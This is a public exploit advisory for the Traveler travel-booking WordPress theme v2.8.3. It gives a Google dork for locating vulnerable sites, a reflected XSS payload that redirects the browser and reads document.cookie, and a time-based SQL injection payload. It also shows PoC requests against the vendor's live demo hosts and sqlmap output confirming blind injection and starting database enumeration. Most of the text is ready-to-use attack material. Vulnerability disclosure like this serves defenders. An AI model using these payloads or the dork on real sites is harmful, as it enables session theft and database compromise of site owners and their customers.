[+] Exploit Title: Travel Booking WordPress Theme v2.8.3 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/traveler/
[+] Date: 2020-06-23
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: ShineTheme [ http://shinetheme.com ]
[+] Software Version: 2.8.3
[+] Software Link: https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79, CWE-89



### [ Info: ]

[i] Multiple Vulnerabilities was discovered in the Travel Booking theme v2.8.2 and v2.8.3 for WordPress.



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?child_number=[payload]

[x] SQL Injection -> /?location_id=[payload]



### [ Payloads: ]

[$] " autofocus '-->--!><Input/Autofocus/*/Onfocus=document.location=`https://themeforest.net/user/vladvector`;alert(document.cookie)//>

[$] %20OR%20SLEEP(8)



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://touragency.travelerwp.com/search-on-sidebar/?child_number=%22%20autofocus%20%27--%3E--!%3E%3CInput/Autofocus/*/Onfocus=document.location=`https://themeforest.net/user/vladvector`;alert(document.cookie)//%3E

[!] GET /search-on-sidebar/?child_number=%22%20autofocus%20%27--%3E--!%3E%3CInput/Autofocus/*/Onfocus=document.location=`https://themeforest.net/user/vladvector`;alert(document.cookie)//%3E HTTP/1.1
Host: touragency.travelerwp.com



### [ PoC SQL Injection: ]

[!] sqlmap --url="https://remap.travelerwp.com/search-rental-full-map/?location_id=1" -dbs --random-agent --time-sec=8

[03:13:37] [INFO] resuming back-end DBMS 'mysql'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: location_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: location_id=1 OR NOT 1188=1188#

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: location_id=1 OR SLEEP(8)
---
[04:17:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (Percona fork)
[04:17:31] [INFO] fetching database names
[04:17:31] [INFO] fetching number of databases



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector